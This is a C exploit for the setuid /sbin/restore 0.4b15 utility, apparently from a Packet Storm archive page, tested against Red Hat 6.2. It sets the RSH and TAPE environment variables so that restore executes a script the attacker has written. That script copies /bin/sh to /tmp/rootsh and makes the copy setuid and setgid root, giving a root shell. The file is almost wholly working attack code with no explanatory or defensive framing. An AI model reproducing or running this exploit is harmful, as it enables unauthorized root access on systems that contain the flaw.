Restore (/sbin/restore) v0.4b15 local root exploit. Tested against Redhat 6.2.
25b1655a9902e87c0615e5d189cded02d9d32a74028c352acca92baf010d53b9/* (linux)restore[0.4b15] local root exploit, by v9[v9@fakehalo.org]. this is
the counterpart to Mat's /sbin/dump exploit findings. it also can be applied
on /sbin/restore i noticed. /sbin/restore has to be setuid root for this to
successfully exploit, of course. -- so here goes.
note: this was built and tested for the redhat 6.2 installation.
*/
#define PATH "/sbin/restore" // path to restore
#define TMPEXEC "/tmp/tmpsh" // the temporary file to execute.
#define SUIDSHELL "/tmp/rootsh" // where the rootshell will be located.
#include <stdio.h>
#include <sys/stat.h>
main(){
char cmd[256],input[3];
struct stat mod1,mod2;
FILE *suidexec;
fprintf(stderr,"[ (linux)restore[0.4b15] local root exploit, by v9[v9@fakehalo"
".org]. ]\n\n",PATH);
if(stat(PATH,&mod1)){
fprintf(stderr,"[!] failed, %s doesnt appear to exist.\n",PATH);
exit(1);
}
else if(mod1.st_mode==36333){
fprintf(stderr,"[*] %s appears to be setuid and setgid.\n",PATH);
}
else{
fprintf(stderr,"[!] failed, %s doesn't appear to be setuid and setgid. (rh de"
"fault)\n",PATH);
exit(1);
}
fprintf(stderr,"[*] now making shell script to execute.\n");
unlink(TMPEXEC);
suidexec=fopen(TMPEXEC,"w");
fprintf(suidexec,"#!/bin/sh\n");
fprintf(suidexec,"cp /bin/sh %s\n",SUIDSHELL);
fprintf(suidexec,"chown root.root %s\n",SUIDSHELL);
fprintf(suidexec,"chmod 6755 %s\n",SUIDSHELL);
fclose(suidexec);
chmod(TMPEXEC,33261);
fprintf(stderr,"[*] done, now setting up environmental variables.\n");
setenv("INPUT",input,1);
setenv("RSH",TMPEXEC,1);
setenv("TAPE",":",1);
fprintf(stderr,"[*] done, now building and executing the command line.\n");
snprintf(input,sizeof(input),"y\nn");
snprintf(cmd,sizeof(cmd),"echo $INPUT | %s -R 1>/dev/null 2>&1",PATH);
system(cmd);
sleep(1);
unlink(TMPEXEC);
fprintf(stderr,"[*] done, now checking for success.\n");
if(stat(SUIDSHELL,&mod2)){
fprintf(stderr,"[!] failed, %s doesn't exist.\n",SUIDSHELL);
exit(1);
}
else if(mod2.st_mode==36333){
fprintf(stderr,"[*] success, %s is now setuid and setgid.\n",SUIDSHELL);
}
else{
fprintf(stderr,"[!] failed, %s exists, but doesnt appear to be setuid and set"
"gid.\n",SUIDSHELL);
exit(1);
}
fprintf(stderr,"[*] finished, everything appeared to have gone successful.\n");
exit(0);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed